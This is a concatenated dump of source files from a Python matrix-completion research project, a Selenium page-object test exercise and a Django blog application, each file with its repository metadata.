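from matrixgeneration import low_rank, spiky, selection
from matrixdecomposition import matrix_decomposition

sp.random.seed(0)
Y = low_rank(30, 3) + spiky(30)   # low-rank component plus sparse spikes
Mask = selection(30, 0.2)         # True where Y is observed

# TH approximates the low-rank part, GA the sparse "spiky" part.
TH, GA = matrix_decomposition(Y * Mask, Mask=Mask,
                              lambda_d=0.025, mu_d=0.005, alpha=20)
```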
{
"alpha_fraction": 0.5345501899719238,
"alphanum_fraction": 0.571056067943573,
"avg_line_length": 23.74193572998047,
"blob_id": "47ec3c77566bb257727f058c264168bc561d9139",
"content_id": "338d9e08fdc961790aea02e2bf78c0e3facc9bd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 767,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 31,
"path": "/unittest_matrixgeneration.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 11:18:10 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport unittest\nimport matrix_generation as mg\n\nimport scipy as sp\nimport numpy.random as random\nimport numpy.linalg\n\nclass TestMatrixGeneration(unittest.TestCase):\n def test_ortonormal(self):\n n = 15\n I = sp.identity(n)\n for _ in range(0, 100):\n M = mg.ortonormal(n)\n self.assertTrue( (M.dot(M.T) - I <= mg.delta()).all() )\n \n def test_low_rank(self):\n for _ in range(0, 100):\n rank = random.randint(3, 8)\n M = mg.low_rank(15, rank)\n actual_rank = numpy.linalg.matrix_rank(M, mg.delta() * 4)\n self.assertEqual(actual_rank, rank)\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5776000022888184,
"alphanum_fraction": 0.5960000157356262,
"avg_line_length": 23.509803771972656,
"blob_id": "308712e467ce587f983b4034d4220b90a92b7a64",
"content_id": "6e8ded89f7cf741deea817da6d789cc1f255f3da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1250,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 51,
"path": "/matrixgeneration.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 11:09:39 2012\n\n@author: Fela Winkelmolen\n\nSome methods to generate test matrixes\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg as linalg\nimport numpy.random as random\n#import load\n\ndef delta():\n return sp.finfo(float).eps * 16\n\ndef ortonormal(m):\n I = sp.identity(m)\n \n # eigenvectors of a random symmetric m by m matrix\n A = sp.rand(m, m)\n #print '---------------------------'\n #print A.sum()\n S = A * A.T\n _, P = linalg.eigh(S)\n #print P\n #print P.dot(P.T)\n # check if really ortonormal\n if ((P.dot(P.T) - I > delta()).any()):\n return ortonormal(m) # try again\n return P\n\ndef low_rank(m, rank):\n diag = sp.concatenate((sp.rand(rank)*5+1, sp.zeros(m-rank)))\n E = sp.diag(diag)\n return ortonormal(m).dot(E).dot(ortonormal(m).T)\n\ndef spiky(m, spikes=None, avg=1.0, sigma=None):\n # substitute None with default values\n spikes = spikes or m\n sigma = sigma or avg/6.0\n \n GA = sp.zeros((m, m))\n r = random.randint(0, m, spikes) # row indexes of spikes\n c = random.randint(0, m, spikes) # column indexes of spikes\n GA[[r, c]] = sigma * random.randn(spikes) + avg\n return GA\n\ndef selection(m, perc):\n return sp.rand(m, m) >= perc\n"
},
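Editor's note: the spike placement in `spiky` relies on NumPy fancy indexing. With index arrays `r` and `c`, `GA[r, c]` addresses exactly the elements (r[i], c[i]); the original `GA[[r, c]]` spelling was only interpreted that way by very old NumPy releases and selects whole rows (or raises) on modern ones, hence the fix above. A tiny illustration:

```python
import numpy as np

GA = np.zeros((4, 4))
r = np.array([0, 2, 3])
c = np.array([1, 3, 0])
GA[r, c] = 7.0   # sets exactly GA[0, 1], GA[2, 3], GA[3, 0]
print(GA)
```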
{
"alpha_fraction": 0.5082097053527832,
"alphanum_fraction": 0.5363007187843323,
"avg_line_length": 30.372671127319336,
"blob_id": "35b9b05f98692d7ebc1ee2517b06a8ef084c7014",
"content_id": "da615e54f6f4c88181b491a855b289c7775ddb11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5055,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 161,
"path": "/test_real_data.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 09:19:57 2012\n\n@author: Fela Winkelmolen\n\nTests using the data from http://archive.ics.uci.edu/ml/datasets/SPECTF+Heart\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\nimport matrixdecomposition as md\n\n\n#############################################################\nclass Experiment:\n def __init__(self, **opt):\n # default values\n self.filename = opt.pop('filename', None) or 'SMALL'\n self.seed = opt.pop('seed', None) or 0\n self.holes = opt.pop('holes', None)\n # do not overwrite if holes is set to .0!\n if self.holes == None:\n self.holes = 0.2 # holes percentage\n self.completion = opt.pop('completion', None) or 'matrix'\n \n self.options = opt\n self.generate_matrix()\n\n def run(self):\n self.generate_mask()\n TH, GA = self.TH, self.GA\n Y, Mask = self.Y, self.mask\n A = self.matrix_completion()\n \n n = (1-Mask).sum()\n diff = (TH-A)*(1-Mask)\n sqerr = (diff**2).sum()\n if n != 0:\n sqerr /= n\n return sqrt(sqerr)\n \n def matrix_completion(self):\n if self.completion == 'matrix':\n res, _ = md.matrix_decomposition(self.Y, self.mask, **self.options)\n elif self.completion == 'mean':\n means = self.Y.mean(0) # means along the column axis\n # calculate the true means along the column axis\n # using only the values in the mask\n rows, cols = self.Y.shape\n means = sp.zeros(cols)\n # calculate the true means along the column axis\n # using only the values in the mask\n for c in range(cols):\n sum = 0.0\n n = 0\n for r in range(rows):\n if self.mask[r][c]:\n sum += self.Y[r][c]\n n += 1\n if n == 0:\n means[c] = 0\n else:\n means[c] = sum/n\n \n res = double(self.Y)\n for r in range(rows):\n for c in range(cols):\n if not self.mask[r][c]:\n res[r][c] = means[c]\n return res\n \n \n # called once after initialization\n def generate_matrix(self):\n filename = 'data/' + self.filename + '.train'\n self.TH, _ = self.load_data(filename)\n self.GA = self.TH * 0\n self.Y = self.TH + self.GA\n \n def generate_mask(self, holes=None):\n if holes != None:\n self.holes = holes\n rows, cols = self.GA.shape\n if self.seed != None:\n seed(self.seed)\n self.mask = rand(rows,cols) > self.holes\n \n @staticmethod\n def load_data(filename):\n M = [[int(i) for i in line.split(',')] for line in open(filename)]\n M = sp.array(M)\n y = M[:, 0]\n X = M[:, range(1, M.shape[1])]\n return (X, y)\n\ndef holes_experiment(**opt):\n n = opt.pop('steps', None) or 5\n runs = opt.pop('runs', None) or 1\n label = opt.pop('label', None)\n #opt['mu_d'] = 0\n y = sp.array(range(n+1)) / float(n)\n x = []\n for holes in y:\n print '.',\n acc = []\n e = Experiment(**opt)\n for i in range(runs):\n e.generate_mask(holes)\n acc.append(e.run())\n x.append(sp.array(acc).mean())\n plot(y, x, label=label)\n legend(loc=0)\n\ndef param_experiment(param_name, params, **opt):\n label = opt.pop('label', None) or param_name\n scale = opt.pop('scale', None) or 'linear'\n x = []\n for p in params:\n print '.',\n opt[param_name] = p\n e = Experiment(**opt)\n x.append(e.run())\n xscale(scale)\n plot(params, x, label=label)\n legend(loc=0)\n\n\n\n# exponential range\ndef exp_range(minval=0.001, maxval=100, steps=10):\n min_exp = sp.log(minval)\n max_exp = sp.log(maxval)\n return sp.exp(sp.linspace(min_exp, max_exp, num=steps))\n\n# test for different completion percentage\n# more runs are made to get an estimate of the variance\n# and completion using the mean of the column is used for comparison\ndef experiment1():\n for s in range(5):\n 
holes_experiment(steps=10, alpha=100000, completion='matrix', seed=s)\n \n #holes_experiment(steps=10, alpha=100000, mu_d=1, completion='matrix', label='mu_d=1')\n \n holes_experiment(steps=20, runs=5, alpha=100000, completion='mean', seed=0, label='mean')\n\n# test different values of mu_d\ndef experiment2():\n params = exp_range(0.00001, 100, 30)\n param_experiment('mu_d', params, alpha=100000, label='0.2')\n figure()\n params = exp_range(0.00001, 100, 30)\n param_experiment('mu_d', params, alpha=100000, holes=0.6, label='0.6')\n\n# test different values of lambda_d\ndef experiment3():\n params = exp_range(0.005, 0.2,)\n param_experiment('lambda_d', params, alpha=100000, label='0.2')\n figure()\n param_experiment('lambda_d', params, alpha=100000, holes=0.6, label='0.2')\n "
},
{
"alpha_fraction": 0.4760563373565674,
"alphanum_fraction": 0.5338028073310852,
"avg_line_length": 22.66666603088379,
"blob_id": "8a15f9bc77693dc47641b60839b9be3841f77b00",
"content_id": "3eca74f7b66493ad73bbabadd0a5dbbb0c790d17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 710,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 30,
"path": "/unittest_matrixdecomposition.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 11:18:35 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport unittest\nimport matrixdecomposition as md\n\nimport scipy as sp\n\nclass TestMatrixGeneration(unittest.TestCase):\n def test_decomposition_id(self):\n # testing using the identity map\n TH = sp.array([[1, 2, 3], [2, 4, 6]])\n GA = sp.array([[0, 0, 0], [0, 100, 0]])\n \n Y = TH + GA\n \n A, B = md.matrix_decomposition(Y, lambda_d=0.1, mu_d=0.08, alpha=1000)\n \n self.assertLess(abs(TH-A).sum(), 1.0, \"\")\n self.assertLess(abs(TH-A).max(), 0.2, \"\")\n \n self.assertLess(abs(GA-A).sum() < 1.0, \"\")\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.53110271692276,
"alphanum_fraction": 0.5457115769386292,
"avg_line_length": 28.082191467285156,
"blob_id": "a59185aa8c311c0de6f2c87c17b1ae8e12d7b16e",
"content_id": "50dd7c578b97b873ef2e617d2fd4cbec63993580",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2122,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 73,
"path": "/test_synthetic_matrixes.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 09:19:57 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\nimport matrixdecomposition as md\n\nclass Tester:\n def __init__(self):\n sp.random.seed(0)\n self._decomposition_args = {}\n self.verbose = True\n self._generate_matrix()\n \n def set_decomposition_options(self, **kwargs):\n self._decomposition_args = kwargs\n \n \"\"\" sets the following instance variables:\n * _Y is the input matrix of the decomposition algorithm\n * _Mask is the mask of _Y equal to True in the positions \n where _Y is observed\n * _TH is the first component of _Y, which we want to recover\n * _GA is the other component\"\"\"\n def _generate_matrix(self):\n pass\n \n def comparative_test(self):\n TH, GA = self._TH, self._GA\n Y, Mask, args = self._Y, self._Mask, self._decomposition_args\n A, B = md.matrix_decomposition(Y, Mask, **args)\n if self.verbose == True:\n print GA[1, :]\n print B[1, :]\n print Mask[1, :]\n print TH[1, :]\n print A[1, :]\n \n error = ((TH - A)**2).sum() / TH.size\n print \"mean square error:\", error\n error2 = ((TH - Y*Mask)**2).sum() / TH.size\n print \"mse for naive solution:\", error2\n print \"improvement:\", error2/error, \"times\"\n\nclass SintheticMatrixTester(Tester):\n def __init__(self):\n # default values\n self._size = 30\n self._rank = 3\n self._holes = 0.2 \n self._noise = 5\n Tester.__init__(self)\n \n def _generate_matrix(self):\n size = self._size\n TH = low_rank(size, self._rank) + sp.rand(size, size)/50*self._noise\n GA = spiky(size)\n Mask = selection(size, self._holes)\n Y = (TH + GA) * Mask\n self._Y, self._TH, self._GA, self._Mask = Y, TH, GA, Mask\n \n def no_noise_test(self):\n pass\n \n def default_test(self):\n pass\n\nt = SintheticMatrixTester()\nt.comparative_test()"
}
] | 7 |
alexalevtmp/stepik575FinalProject | https://github.com/alexalevtmp/stepik575FinalProject | b6c00d1b89d933d23f7822fd8f5533b919c9fbfa | e7a593b8dcfb11dc3a914cc9a4f17b7032c9bf38 | 5297df4b7efa8896d5cb3cd5839006af7f9a5f21 | refs/heads/master | 2022-12-24T05:19:06.998205 | 2019-08-02T05:21:01 | 2019-08-02T05:21:01 | 199,535,383 | 0 | 0 | null | 2019-07-29T22:35:39 | 2019-08-02T05:21:23 | 2022-12-08T05:56:54 | Python | [
{
"alpha_fraction": 0.662911593914032,
"alphanum_fraction": 0.664644718170166,
"avg_line_length": 40.74074172973633,
"blob_id": "935cb695c04bb71dfa10496394b5fff2966a1a4c",
"content_id": "6ba353dd4932982908d507351b4b6626969c39d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1276,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 27,
"path": "/pages/login_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\r\nfrom .locators import LoginPageLocators\r\n\r\n\r\nclass LoginPage(BasePage):\r\n def should_be_login_page(self):\r\n self.should_be_login_url()\r\n self.should_be_login_form()\r\n self.should_be_register_form()\r\n\r\n def should_be_login_url(self):\r\n # реализуйте проверку на корректный url адрес\r\n # assert self.url.find(\"/login/\") != -1, \"Login url is not presented\"\r\n # assert self.is_element_present(*LoginPageLocators.LOGIN_LINK), \"Login link is not presented\"\r\n assert self.browser.current_url.find(\"login\") != -1, \"Login url is not presented\"\r\n # current_url\r\n # Gets the URL of the current page.\r\n # Usage:\tdriver.current_url\r\n\r\n def should_be_login_form(self):\r\n # реализуйте проверку, что есть форма логина\r\n assert self.is_element_present(*LoginPageLocators.LOGIN_FORM), \"Login form is not presented\"\r\n\r\n\r\n def should_be_register_form(self):\r\n # реализуйте проверку, что есть форма регистрации на странице\r\n assert self.is_element_present(*LoginPageLocators.REGISTER_FORM), \"Registration form is not presented\"\r\n"
},
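Editor's note: `LoginPage` calls `self.is_element_present(...)`, inherited from `BasePage`, which is not included in this dump. A typical implementation of that helper, reproduced here as an assumption about what `pages/base_page.py` contains:

```python
from selenium.common.exceptions import NoSuchElementException

class BasePage(object):
    def __init__(self, browser, url):
        self.browser = browser
        self.url = url

    def open(self):
        # Navigate the driver to the page's url.
        self.browser.get(self.url)

    def is_element_present(self, how, what):
        # True if the locator tuple (how, what) matches at least one element.
        try:
            self.browser.find_element(how, what)
        except NoSuchElementException:
            return False
        return True
```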
{
"alpha_fraction": 0.6715328693389893,
"alphanum_fraction": 0.8029196858406067,
"avg_line_length": 21.83333396911621,
"blob_id": "8301b4cdbaea8440d7287861eef9e4fe025f0826",
"content_id": "7ba71bdbcb75ac14f26edad0255b7bfec1b4c4a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 6,
"path": "/README.md",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "# stepik575FinalProject\n\ncreated on:\nhttps://stepik.org/lesson/199980/step/6?unit=174035\n4.1 Что такое Page Object?\nПодготовка окружения\n"
},
{
"alpha_fraction": 0.5578168630599976,
"alphanum_fraction": 0.5821769833564758,
"avg_line_length": 42.2400016784668,
"blob_id": "0a986487e73c86152c38c5ea43d3752d092755a3",
"content_id": "28bff641e3fe6fe5f3c47b90e300261e53f68885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3537,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 75,
"path": "/test_main_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .pages.main_page import MainPage\nfrom .pages.login_page import LoginPage\n\n# link for 4.3-2\n# link = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer\"\n\n# link for 4.3-3\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=newYear2019\"\n\n# link = \"http://selenium1py.pythonanywhere.com/\"\n\n# link_login = \"http://selenium1py.pythonanywhere.com/en-gb/accounts/login/\"\n\n\n# def test_guest_can_go_to_login_page(browser):\n# page = MainPage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес \n# page.open() # открываем страницу\n# page.go_to_login_page() # выполняем метод страницы - переходим на страницу логина\n\n# def test_guest_should_see_login_link(browser):\n# page = MainPage(browser, link)\n# page.open()\n# page.should_be_login_link()\n\n\n\n# # Второй подход: переход происходит неявно, страницу инициализируем в теле теста: \n# # 1. Закомментируйте строку с возвращаемым значением \n\ndef go_to_login_page(self):\n link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n # return LoginPage(browser=self.browser, url=self.browser.current_url) \n\n# # 2. Инициализируем LoginPage в теле теста (не забудьте импортировать в файл нужный класс): \n\n# # from .pages.login_page import LoginPage\n\ndef test_guest_can_go_to_login_page(browser):\n link = \"http://selenium1py.pythonanywhere.com\"\n page = MainPage(browser, link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n\n\n## from prev step!\n# def test_should_be_login_page(browser):\n# page = LoginPage(browser, link_login)\n# page.open()\n# page.should_be_login_page()\n\n\n# \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer\"\n\n# \"http://selenium1py.pythonanywhere.com/\"\n# \"http://selenium1py.pythonanywhere.com/en-gb/accounts/login/\"\n\n\n# Wed Jul 31 20:36:11 UTC 2019\n# (selenium_env) bash-3.2$ pytest -v --tb=line --language=en test_main_page.py\n# ============================================================ test session starts =============================================================\n# platform darwin -- Python 3.7.3, pytest-3.10.1, py-1.8.0, pluggy-0.12.0 -- /anaconda3/envs/selenium_env/bin/python\n# cachedir: .pytest_cache\n# rootdir: /Users/asl/stepik575/stepik575FinalProject, inifile:\n# plugins: rerunfailures-3.1\n# collected 3 items \n\n# test_main_page.py::test_guest_can_go_to_login_page PASSED [ 33%]\n# test_main_page.py::test_guest_should_see_login_link PASSED [ 66%]\n# test_main_page.py::test_should_be_login_page PASSED [100%]\n\n# ========================================================= 3 passed in 12.95 seconds ==========================================================\n"
},
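Editor's note: the commented-out `return` in `go_to_login_page` above belongs to the file's "first approach", where the page method itself returns the next Page Object so the test can chain. A sketch of what restoring it would look like; `MainPageLocators` is the class from `pages/locators.py`, which is not shown in this dump:

```python
# In pages/main_page.py (sketch of the first approach):
def go_to_login_page(self):
    link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)
    link.click()
    return LoginPage(browser=self.browser, url=self.browser.current_url)

# The test then receives the next page object directly:
def test_guest_can_go_to_login_page(browser):
    page = MainPage(browser, "http://selenium1py.pythonanywhere.com")
    page.open()
    login_page = page.go_to_login_page()
    login_page.should_be_login_page()
```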
{
"alpha_fraction": 0.6903870105743408,
"alphanum_fraction": 0.6953807473182678,
"avg_line_length": 37.19047546386719,
"blob_id": "1aef58b07490f2d6a951da55c419730037a34884",
"content_id": "3449122f9748815790123c49c8a14ad915dd7f36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 21,
"path": "/test_product_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .pages.product_page import ProductPage\nfrom .pages.locators import ProductPageLocators # ADD_TO_CART\n\n# locators.py\n# class ProductPageLocators(object):\n# ADD_TO_CART = (By.CSS_SELECTOR, \"btn-add-to-basket\")\n\n\n# def test_guest_can_go_to_login_page(browser):\n# page = MainPage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес \n# page.open() # открываем страницу\n# page.go_to_login_page() # выполняем метод страницы - переходим на страницу логина\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n\ndef test_guest_can_add_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_cart()\n \n # add_to_cart()"
},
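Editor's note: `ProductPage.add_to_cart` (shown later in this repo) calls `self.solve_quiz_and_get_code()`, a `BasePage` helper not included in this dump. In this stepik course the helper is usually the alert-solving snippet below; it is reproduced here as an assumption about `base_page.py`, not as this repo's verified code:

```python
import math
from selenium.common.exceptions import NoAlertPresentException

def solve_quiz_and_get_code(self):
    # The promo page pops a math quiz in a JS alert; answer it to get the code.
    alert = self.browser.switch_to.alert
    x = alert.text.split(" ")[2]
    answer = str(math.log(abs(12 * math.sin(float(x)))))
    alert.send_keys(answer)
    alert.accept()
    try:
        alert = self.browser.switch_to.alert
        print("Your code: {}".format(alert.text))
        alert.accept()
    except NoAlertPresentException:
        print("No second alert presented")
```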
{
"alpha_fraction": 0.6693455576896667,
"alphanum_fraction": 0.6693455576896667,
"avg_line_length": 31.22222137451172,
"blob_id": "7177488f5b145e7a6d3d6cabed245bc0c9c9192d",
"content_id": "a7983c1a39f4799b0164a21496b258e1ef3d3835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 27,
"path": "/pages/product_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import ProductPageLocators\n# from .locators import MainPageLocators\n\n\nclass ProductPage(BasePage):\n\n def add_to_cart(self):\n login_link = self.browser.find_element(*ProductPageLocators.ADD_TO_CART)\n login_link.click()\n self.solve_quiz_and_get_code() \n # pass\n\n def guest_can_add_product_to_cart(self):\n pass\n\n\n# class MainPage(BasePage):\n# def go_to_login_page(self):\n# login_link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n# login_link.click()\n\n# # def should_be_login_link(self):\n# # assert self.is_element_present(By.CSS_SELECTOR, \"#registration_link\"), \"Login link is not presented\"\n\n# def should_be_login_link(self):\n# assert self.is_element_present(*MainPageLocators.LOGIN_LINK), \"Login link is not presented\"\n\n"
}
] | 5 |
IsmaelB83/DjangoWeb | https://github.com/IsmaelB83/DjangoWeb | 3976996b86f16287f44befabc7b535eab3f6142f | 42160e6d0ac3dee2559ea3470319b377c40b24bd | 48b4c46ec12cd044191dec43aca9c9bf4971e57b | refs/heads/master | 2021-05-07T05:21:53.135576 | 2019-11-02T06:56:06 | 2019-11-02T06:56:06 | 111,456,962 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6445121765136719,
"alphanum_fraction": 0.6463414430618286,
"avg_line_length": 27.275861740112305,
"blob_id": "6ebf55708d561525900cf762d6c132bc70bf4286",
"content_id": "8bda5eb30d35852820f269f7814ba117dbefaa8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3280,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 116,
"path": "/post/admin.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib import admin\n# Third party app imports\n# Local app imports\nfrom .models import Post, PostCategory, PostImage, PostImageSmall, PostComment, PostArchive, PostView, PostLike\n\n\n# More info here: https://docs.djangoproject.com/en/1.11/intro/tutorial07/\nclass PostModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"title\", \"content\", \"published_date\", \"updated\", \"timestamp\"]\n list_display_links = [\"title\"]\n list_editable = [\"content\"]\n list_filter = [\"published_date\", \"updated\", \"timestamp\"]\n search_fields = [\"published_date\", \"title\", \"content\"]\n\n class Meta:\n model = Post\n\n\nclass PostCategoryModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"category\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"category\"]\n list_filter = [\"post\", \"category\"]\n search_fields = [\"post\", \"category\"]\n\n class Meta:\n model = PostCategory\n\n\nclass PostImageModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"image\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"image\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n\n class Meta:\n model = PostImage\n\n\nclass PostImageSmallModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"image\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"image\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n \n class Meta:\n model = PostImageSmall\n\n\nclass PostCommentAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"comment\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"comment\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n\n class Meta:\n model = PostComment\n\n\nclass PostArchiveAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"year\", \"month\", \"posts\"]\n list_display_links = [\"id\"]\n list_editable = [\"posts\"]\n list_filter = [\"year\", \"month\"]\n search_fields = [\"year\", \"month\"]\n\n class Meta:\n model = PostArchive\n\n\nclass PostViewAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"ip\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"ip\"]\n list_filter = [\"post\", \"date\"]\n search_fields = [\"post\", \"date\", \"ip\"]\n\n class Meta:\n model = PostView\n\n\nclass PostLikeAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"date\", \"user\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"user\"]\n list_filter = [\"post\", \"date\"]\n search_fields = [\"post\", \"date\", \"user\"]\n\n class Meta:\n model = PostLike\n\n\nadmin.site.register(Post, PostModelAdmin)\nadmin.site.register(PostCategory, PostCategoryModelAdmin)\nadmin.site.register(PostImage, PostImageModelAdmin)\nadmin.site.register(PostImageSmall, PostImageSmallModelAdmin)\nadmin.site.register(PostComment, PostCommentAdmin)\nadmin.site.register(PostArchive, PostArchiveAdmin)\nadmin.site.register(PostView, PostViewAdmin)\nadmin.site.register(PostLike, PostLikeAdmin)\n\n\n# Admin is very good to model the application because it\n# easily allow us to test the CRUD concept:#\n# CRUD: Create* -- POST\n# Retrieve -- GET (Examples: List / Search)\n# Update* -- PUT/PATCH\n# Delete* -- DELETE\n#\n# * They will require permnissons\n"
},
{
"alpha_fraction": 0.6990358233451843,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 32.76744079589844,
"blob_id": "b68d5cca5e524b2df8e84ef71d9042b3bf0e53e1",
"content_id": "747cfd9efc6cbfb377d87418f4ff0c5ee746d038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 43,
"path": "/post/forms.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django import forms\nfrom django.apps import apps\n# Third party app imports\nfrom multiupload.fields import MultiFileField\n# Local app imports\nfrom .models import Post, PostComment\n\n\nCATEGORY_CHOICES = [[c.id, c.name] for c in apps.get_model('category', 'Category').objects.all()]\n\n\nclass PostForm(forms.ModelForm):\n postcategory = forms.MultipleChoiceField(\n choices=CATEGORY_CHOICES,\n required=True,\n widget=forms.CheckboxSelectMultiple\n )\n status = forms.ChoiceField(choices=Post.STATUSES, required=True, widget=forms.RadioSelect)\n image_file = forms.FileField()\n postimage = MultiFileField(min_num=1)\n postimagesmall = MultiFileField(min_num=1, required=False)\n \n class Meta:\n model = Post\n fields = ('title', 'postcategory', 'status', 'published_date', 'image_file', 'content', 'postimage', 'postimagesmall')\n\n\nclass PostFormEdit(forms.ModelForm):\n postcategory = forms.MultipleChoiceField(\n choices=CATEGORY_CHOICES,\n required=True,\n widget=forms.CheckboxSelectMultiple\n )\n image_file = forms.FileField(required=False)\n postimage = MultiFileField(min_num=1, required=False)\n postimagesmall = MultiFileField(min_num=1, required=False)\n\n class Meta:\n model = Post\n fields = ('title', 'postcategory', 'status', 'published_date', 'image_file', 'content', 'postimage', 'postimagesmall')\n"
},
{
"alpha_fraction": 0.6392037868499756,
"alphanum_fraction": 0.641415536403656,
"avg_line_length": 41.05813980102539,
"blob_id": "79a12edc84ab4bb67ac5635d02516ba316b01931",
"content_id": "19a76a80aa0a2dd2354e7ce1b99452e06578f4a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3617,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 86,
"path": "/user/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.core.files import File\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\ndef upload_location_author(instance, filename):\n return 'profiles/%s/%s' % (instance.user, filename)\n\n\n# Create your models here.\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n country = models.CharField(max_length=20, blank=True, null=False)\n location = models.CharField(max_length=30, blank=True, null=False)\n description = models.CharField(max_length=100, blank=True, null=False)\n introduction = models.TextField(blank=True, null=False)\n image = models.ImageField(\n upload_to=upload_location_author,\n 